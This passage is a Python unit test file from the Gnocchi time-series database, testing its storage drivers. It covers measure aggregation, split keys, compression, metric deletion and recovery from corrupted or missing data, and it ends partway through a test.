# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
import mock
import numpy
import six.moves
from gnocchi import archive_policy
from gnocchi import carbonara
from gnocchi import incoming
from gnocchi import indexer
from gnocchi import storage
from gnocchi.storage import ceph
from gnocchi.storage import file
from gnocchi.storage import redis
from gnocchi.storage import s3
from gnocchi.storage import swift
from gnocchi.tests import base as tests_base
def datetime64(*args):
return numpy.datetime64(datetime.datetime(*args))
class TestStorageDriver(tests_base.TestCase):
def setUp(self):
super(TestStorageDriver, self).setUp()
# A lot of tests wants a metric, create one
self.metric, __ = self._create_metric()
def test_driver_str(self):
driver = storage.get_driver(self.conf)
if isinstance(driver, file.FileStorage):
s = driver.basepath
elif isinstance(driver, ceph.CephStorage):
s = driver.rados.get_fsid()
elif isinstance(driver, redis.RedisStorage):
s = driver._client
elif isinstance(driver, s3.S3Storage):
s = driver._bucket_name
elif isinstance(driver, swift.SwiftStorage):
s = driver._container_prefix
self.assertEqual(str(driver), "%s: %s" % (
driver.__class__.__name__, s))
def test_get_driver(self):
driver = storage.get_driver(self.conf)
self.assertIsInstance(driver, storage.StorageDriver)
def test_file_driver_subdir_len(self):
driver = storage.get_driver(self.conf)
if not isinstance(driver, file.FileStorage):
self.skipTest("not file driver")
# Check the default
self.assertEqual(2, driver.SUBDIR_LEN)
metric = mock.Mock(id=uuid.UUID("12345678901234567890123456789012"))
expected = (driver.basepath + "/12/34/56/78/90/12/34/56/78/90/12/34/56"
"/78/90/12/12345678-9012-3456-7890-123456789012")
self.assertEqual(expected, driver._build_metric_dir(metric))
driver._file_subdir_len = 16
expected = (driver.basepath + "/1234567890123456/7890123456"
"789012/12345678-9012-3456-7890-123456789012")
self.assertEqual(expected, driver._build_metric_dir(metric))
driver._file_subdir_len = 15
expected = (driver.basepath + "/123456789012345/67890123456"
"7890/12/12345678-9012-3456-7890-123456789012")
self.assertEqual(expected, driver._build_metric_dir(metric))
def test_corrupted_split(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
])
self.trigger_processing()
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 'm'))
with mock.patch('gnocchi.carbonara.AggregatedTimeSerie.unserialize',
side_effect=carbonara.InvalidData()):
results = self.storage._get_splits_and_unserialize({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1387800000, 's'),
numpy.timedelta64(5, 'm'))
],
},
})[self.metric][aggregation]
self.assertEqual(1, len(results))
self.assertIsInstance(results[0], carbonara.AggregatedTimeSerie)
# Assert it's an empty one since corrupted
self.assertEqual(0, len(results[0]))
self.assertEqual(results[0].aggregation, aggregation)
def test_get_splits_and_unserialize(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
])
self.trigger_processing()
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 'm'))
results = self.storage._get_splits_and_unserialize({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1387800000, 's'),
numpy.timedelta64(5, 'm')),
],
},
})[self.metric][aggregation]
self.assertEqual(1, len(results))
self.assertIsInstance(results[0], carbonara.AggregatedTimeSerie)
# Assert it's not empty one since corrupted
self.assertGreater(len(results[0]), 0)
self.assertEqual(results[0].aggregation, aggregation)
def test_corrupted_data(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
])
self.trigger_processing()
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 13, 0, 1), 1),
])
with mock.patch('gnocchi.carbonara.AggregatedTimeSerie.unserialize',
side_effect=carbonara.InvalidData()):
with mock.patch('gnocchi.carbonara.BoundTimeSerie.unserialize',
side_effect=carbonara.InvalidData()):
self.trigger_processing()
m = self.storage.get_measures(
self.metric,
self.metric.archive_policy.get_aggregations_for_method('mean'),
)['mean']
self.assertIn((datetime64(2014, 1, 1),
numpy.timedelta64(1, 'D'), 1), m)
self.assertIn((datetime64(2014, 1, 1, 13),
numpy.timedelta64(1, 'h'), 1), m)
self.assertIn((datetime64(2014, 1, 1, 13),
numpy.timedelta64(5, 'm'), 1), m)
def test_aborted_initial_processing(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 5),
])
with mock.patch.object(self.storage, '_store_unaggregated_timeseries',
side_effect=Exception):
try:
self.trigger_processing()
except Exception:
pass
with mock.patch('gnocchi.storage.LOG') as LOG:
self.trigger_processing()
self.assertFalse(LOG.error.called)
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("mean")
)
m = self.storage.get_measures(self.metric, aggregations)['mean']
self.assertIn((datetime64(2014, 1, 1),
numpy.timedelta64(1, 'D'), 5.0), m)
self.assertIn((datetime64(2014, 1, 1, 12),
numpy.timedelta64(1, 'h'), 5.0), m)
self.assertIn((datetime64(2014, 1, 1, 12),
numpy.timedelta64(5, 'm'), 5.0), m)
def test_delete_nonempty_metric(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
])
self.trigger_processing()
self.storage._delete_metric(self.metric)
self.trigger_processing()
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("mean")
)
self.assertRaises(storage.MetricDoesNotExist,
self.storage.get_measures,
self.metric, aggregations)
self.assertEqual(
{self.metric: None},
self.storage._get_or_create_unaggregated_timeseries([self.metric]))
def test_measures_reporting_format(self):
report = self.incoming.measures_report(True)
self.assertIsInstance(report, dict)
self.assertIn('summary', report)
self.assertIn('metrics', report['summary'])
self.assertIn('measures', report['summary'])
self.assertIn('details', report)
self.assertIsInstance(report['details'], dict)
report = self.incoming.measures_report(False)
self.assertIsInstance(report, dict)
self.assertIn('summary', report)
self.assertIn('metrics', report['summary'])
self.assertIn('measures', report['summary'])
self.assertNotIn('details', report)
def test_measures_reporting(self):
m2, __ = self._create_metric('medium')
for i in six.moves.range(60):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, i), 69),
])
self.incoming.add_measures(m2.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, i), 69),
])
report = self.incoming.measures_report(True)
self.assertIsInstance(report, dict)
self.assertEqual(2, report['summary']['metrics'])
self.assertEqual(120, report['summary']['measures'])
self.assertIn('details', report)
self.assertIsInstance(report['details'], dict)
report = self.incoming.measures_report(False)
self.assertIsInstance(report, dict)
self.assertEqual(2, report['summary']['metrics'])
self.assertEqual(120, report['summary']['measures'])
def test_get_aggregated_measures(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
self.trigger_processing([self.metric])
aggregations = self.metric.archive_policy.aggregations
measures = self.storage.get_aggregated_measures(
{self.metric: aggregations})
self.assertEqual(1, len(measures))
self.assertIn(self.metric, measures)
measures = measures[self.metric]
self.assertEqual(len(aggregations), len(measures))
self.assertGreater(len(measures[aggregations[0]]), 0)
for agg in aggregations:
self.assertEqual(agg, measures[agg].aggregation)
def test_get_aggregated_measures_multiple(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
m2, __ = self._create_metric('medium')
self.incoming.add_measures(m2.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
self.trigger_processing([self.metric, m2])
aggregations = self.metric.archive_policy.aggregations
measures = self.storage.get_aggregated_measures(
{self.metric: aggregations,
m2: m2.archive_policy.aggregations})
self.assertEqual({self.metric, m2}, set(measures.keys()))
self.assertEqual(len(aggregations), len(measures[self.metric]))
self.assertGreater(len(measures[self.metric][aggregations[0]]), 0)
for agg in aggregations:
self.assertEqual(agg, measures[self.metric][agg].aggregation)
self.assertEqual(len(m2.archive_policy.aggregations),
len(measures[m2]))
self.assertGreater(
len(measures[m2][m2.archive_policy.aggregations[0]]), 0)
for agg in m2.archive_policy.aggregations:
self.assertEqual(agg, measures[m2][agg].aggregation)
def test_add_measures_big(self):
m, __ = self._create_metric('high')
self.incoming.add_measures(m.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
self.trigger_processing([m])
aggregations = (
m.archive_policy.get_aggregations_for_method("mean")
)
self.assertEqual(3661, len(
self.storage.get_measures(m, aggregations)['mean']))
@mock.patch('gnocchi.carbonara.SplitKey.POINTS_PER_SPLIT', 48)
def test_add_measures_update_subset_split(self):
m, m_sql = self._create_metric('medium')
measures = [
incoming.Measure(datetime64(2014, 1, 6, i, j, 0), 100)
for i in six.moves.range(2) for j in six.moves.range(0, 60, 2)]
self.incoming.add_measures(m.id, measures)
self.trigger_processing([m])
# add measure to end, in same aggregate time as last point.
self.incoming.add_measures(m.id, [
incoming.Measure(datetime64(2014, 1, 6, 1, 58, 1), 100)])
with mock.patch.object(self.storage, '_store_metric_splits') as c:
# should only resample last aggregate
self.trigger_processing([m])
count = 0
for call in c.mock_calls:
# policy is 60 points and split is 48. should only update 2nd half
args = call[1]
for metric, key_agg_data_offset in six.iteritems(args[0]):
if metric.id == m_sql.id:
for key, aggregation, data, offset in key_agg_data_offset:
if (key.sampling == numpy.timedelta64(1, 'm')
and aggregation.method == "mean"):
count += 1
self.assertEqual(1, count)
def test_add_measures_update_subset(self):
m, m_sql = self._create_metric('medium')
measures = [
incoming.Measure(datetime64(2014, 1, 6, i, j, 0), 100)
for i in six.moves.range(2) for j in six.moves.range(0, 60, 2)]
self.incoming.add_measures(m.id, measures)
self.trigger_processing([m])
# add measure to end, in same aggregate time as last point.
new_point = datetime64(2014, 1, 6, 1, 58, 1)
self.incoming.add_measures(m.id, [incoming.Measure(new_point, 100)])
with mock.patch.object(self.incoming, 'add_measures') as c:
self.trigger_processing([m])
for __, args, __ in c.mock_calls:
self.assertEqual(
list(args[3])[0][0], carbonara.round_timestamp(
new_point, args[1].granularity * 10e8))
def test_delete_old_measures(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
])
self.trigger_processing()
aggregations = (
self.metric.archive_policy.get_aggregations_for_method("mean")
)
self.assertEqual({"mean": [
(datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
(datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
(datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
(datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
]}, self.storage.get_measures(self.metric, aggregations))
# One year later…
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2015, 1, 1, 12, 0, 1), 69),
])
self.trigger_processing()
self.assertEqual({"mean": [
(datetime64(2015, 1, 1), numpy.timedelta64(1, 'D'), 69),
(datetime64(2015, 1, 1, 12), numpy.timedelta64(1, 'h'), 69),
(datetime64(2015, 1, 1, 12), numpy.timedelta64(5, 'm'), 69),
]}, self.storage.get_measures(self.metric, aggregations))
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'D'))
self.assertEqual({
self.metric: {
agg: {carbonara.SplitKey(numpy.datetime64(1244160000, 's'),
numpy.timedelta64(1, 'D'))},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'h'))
self.assertEqual({
self.metric: {
agg: {carbonara.SplitKey(numpy.datetime64(1412640000, 's'),
numpy.timedelta64(1, 'h'))},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 'm'))
self.assertEqual({
self.metric: {
agg: {carbonara.SplitKey(numpy.datetime64(1419120000, 's'),
numpy.timedelta64(5, 'm'))},
}
}, self.storage._list_split_keys({self.metric: [agg]}))
def test_get_measures_return(self):
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
])
self.trigger_processing()
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(5, 'm'))
data = self.storage._get_splits({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(5, 'm'),
)]}})
self.assertEqual(1, len(data))
data = data[self.metric]
self.assertEqual(1, len(data))
data = data[aggregation]
self.assertEqual(1, len(data))
self.assertIsInstance(data[0], bytes)
self.assertGreater(len(data[0]), 0)
existing = data[0]
# Now retrieve an existing and a non-existing key
data = self.storage._get_splits({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(5, 'm'),
),
carbonara.SplitKey(
numpy.datetime64(1451520010, 's'),
numpy.timedelta64(5, 'm'),
),
]}})
self.assertEqual(1, len(data))
data = data[self.metric]
self.assertEqual(1, len(data))
data = data[aggregation]
self.assertEqual(2, len(data))
self.assertIsInstance(data[0], bytes)
self.assertGreater(len(data[0]), 0)
self.assertEqual(existing, data[0])
self.assertIsNone(data[1])
# Now retrieve a non-existing and an existing key
data = self.storage._get_splits({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(155152000, 's'),
numpy.timedelta64(5, 'm'),
),
carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(5, 'm'),
)
]}})
self.assertEqual(1, len(data))
data = data[self.metric]
self.assertEqual(1, len(data))
data = data[aggregation]
self.assertEqual(2, len(data))
self.assertIsInstance(data[1], bytes)
self.assertGreater(len(data[1]), 0)
self.assertEqual(existing, data[1])
self.assertIsNone(data[0])
m2, _ = self._create_metric()
# Now retrieve a non-existing (= no aggregated measures) metric
data = self.storage._get_splits({
m2: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1451520010, 's'),
numpy.timedelta64(5, 'm'),
),
carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(5, 'm'),
)
]}})
self.assertEqual({m2: {aggregation: [None, None]}}, data)
def test_rewrite_measures(self):
# Create an archive policy that spans on several splits. Each split
# being 3600 points, let's go for 36k points so we have 10 splits.
apname = str(uuid.uuid4())
ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
self.index.create_archive_policy(ap)
self.metric = indexer.Metric(uuid.uuid4(), ap)
self.index.create_metric(self.metric.id, str(uuid.uuid4()),
apname)
# First store some points scattered across different splits
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')),
},
}
}, self.storage._list_split_keys({self.metric: [agg]}))
if self.storage.WRITE_FULL:
assertCompressedIfWriteFull = self.assertTrue
else:
assertCompressedIfWriteFull = self.assertFalse
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
]}, self.storage.get_measures(self.metric, [aggregation]))
# Now store brand new points that should force a rewrite of one of the
# split (keep in mind the back window size in one hour here). We move
# the BoundTimeSerie processing timeserie far away from its current
# range.
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64(1452384000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')),
},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
# Now this one is compressed because it has been rewritten!
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [
carbonara.SplitKey(
numpy.datetime64(1452384000, 's'),
numpy.timedelta64(60, 's'),
)]}})[self.metric][aggregation][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
(datetime64(2016, 1, 10, 16, 18), numpy.timedelta64(1, 'm'), 45),
(datetime64(2016, 1, 10, 17, 12), numpy.timedelta64(1, 'm'), 46),
]}, self.storage.get_measures(self.metric, [aggregation]))
def test_rewrite_measures_multiple_granularities(self):
apname = str(uuid.uuid4())
# Create an archive policy with two different granularities
ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60), (36000, 1)])
self.index.create_archive_policy(ap)
self.metric = indexer.Metric(uuid.uuid4(), ap)
self.index.create_metric(self.metric.id, str(uuid.uuid4()),
apname)
# First store some points
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 6, 18, 15, 46), 43),
incoming.Measure(datetime64(2016, 1, 6, 18, 15, 47), 43),
incoming.Measure(datetime64(2016, 1, 6, 18, 15, 48), 43),
])
self.trigger_processing()
# Add some more points, mocking out WRITE_FULL attribute of the current
# driver, so that rewrite happens
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 7, 18, 15, 49), 43),
incoming.Measure(datetime64(2016, 1, 7, 18, 15, 50), 43),
incoming.Measure(datetime64(2016, 1, 7, 18, 18, 46), 43),
])
driver = storage.get_driver(self.conf)
with mock.patch.object(driver.__class__, 'WRITE_FULL', False):
self.trigger_processing()
def test_rewrite_measures_oldest_mutable_timestamp_eq_next_key(self):
"""See LP#1655422"""
# Create an archive policy that spans on several splits. Each split
# being 3600 points, let's go for 36k points so we have 10 splits.
apname = str(uuid.uuid4())
ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
self.index.create_archive_policy(ap)
self.metric = indexer.Metric(uuid.uuid4(), ap)
self.index.create_metric(self.metric.id, str(uuid.uuid4()),
apname)
# First store some points scattered across different splits
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')),
},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
if self.storage.WRITE_FULL:
assertCompressedIfWriteFull = self.assertTrue
else:
assertCompressedIfWriteFull = self.assertFalse
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
data = self.storage._get_splits(
{self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits(
{self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits(
{self.metric: {aggregation: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm')
)]}})[self.metric][aggregation][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
]}, self.storage.get_measures(self.metric, [aggregation]))
# Now store brand new points that should force a rewrite of one of the
# split (keep in mind the back window size is one hour here). We move
# the BoundTimeSerie processing timeserie far away from its current
# range.
# Here we test a special case where the oldest_mutable_timestamp will
# be 2016-01-10T00:00:00 = 1452384000.0, our new split key.
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 10, 0, 12), 45),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64('2016-01-10T00:00:00'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64('2016-01-02T12:00:00'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64('2015-12-31T00:00:00'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64('2016-01-05T00:00:00'),
numpy.timedelta64(1, 'm')),
},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
data = self.storage._get_splits({
self.metric: {
agg: [carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][agg][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
agg: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][agg][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
agg: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(60, 's')
)]}})[self.metric][agg][0]
# Now this one is compressed because it has been rewritten!
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
agg: [carbonara.SplitKey(
numpy.datetime64(1452384000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][agg][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
(datetime64(2016, 1, 10, 0, 12), numpy.timedelta64(1, 'm'), 45),
]}, self.storage.get_measures(self.metric, [aggregation]))
def test_rewrite_measures_corruption_missing_file(self):
# Create an archive policy that spans on several splits. Each split
# being 3600 points, let's go for 36k points so we have 10 splits.
apname = str(uuid.uuid4())
ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
self.index.create_archive_policy(ap)
self.metric = indexer.Metric(uuid.uuid4(), ap)
self.index.create_metric(self.metric.id, str(uuid.uuid4()),
apname)
# First store some points scattered across different splits
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
])
self.trigger_processing()
agg = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
self.assertEqual({
self.metric: {
agg: {
carbonara.SplitKey(numpy.datetime64('2015-12-31T00:00:00'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64('2016-01-02T12:00:00'),
numpy.timedelta64(1, 'm')),
carbonara.SplitKey(numpy.datetime64('2016-01-05T00:00:00'),
numpy.timedelta64(1, 'm')),
},
},
}, self.storage._list_split_keys({self.metric: [agg]}))
if self.storage.WRITE_FULL:
assertCompressedIfWriteFull = self.assertTrue
else:
assertCompressedIfWriteFull = self.assertFalse
aggregation = self.metric.archive_policy.get_aggregation(
"mean", numpy.timedelta64(1, 'm'))
data = self.storage._get_splits({
self.metric: {
aggregation:
[carbonara.SplitKey(
numpy.datetime64(1451520000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451736000, 's'),
numpy.timedelta64(1, 'm')
)]}})[self.metric][aggregation][0]
self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
data = self.storage._get_splits({
self.metric: {
aggregation: [carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm'),
)]}})[self.metric][aggregation][0]
assertCompressedIfWriteFull(
carbonara.AggregatedTimeSerie.is_compressed(data))
self.assertEqual({"mean": [
(datetime64(2016, 1, 1, 12),
numpy.timedelta64(1, 'm'), 69),
(datetime64(2016, 1, 2, 13, 7),
numpy.timedelta64(1, 'm'), 42),
(datetime64(2016, 1, 4, 14, 9),
numpy.timedelta64(1, 'm'), 4),
(datetime64(2016, 1, 6, 15, 12),
numpy.timedelta64(1, 'm'), 44),
]}, self.storage.get_measures(self.metric, [aggregation]))
# Test what happens if we delete the latest split and then need to
# compress it!
self.storage._delete_metric_splits(
{self.metric: [(carbonara.SplitKey(
numpy.datetime64(1451952000, 's'),
numpy.timedelta64(1, 'm'),
), aggregation)]})
# Now store brand new points that should force a rewrite of one of the
# split (keep in mind the back window size in one hour here). We move
# the BoundTimeSerie processing timeserie far away from its current
# range.
self.incoming.add_measures(self.metric.id, [
incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
])
self.trigger_processing()
def test_rewrite_measures_corruption_bad_data(self):
# Create an archive policy that spans on several splits. Each split
# being 3600 points, let's go for 36k points so we have 10 splits.
apname = str(uuid.uuid4())
ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
self.index.create_archive_policy(ap)
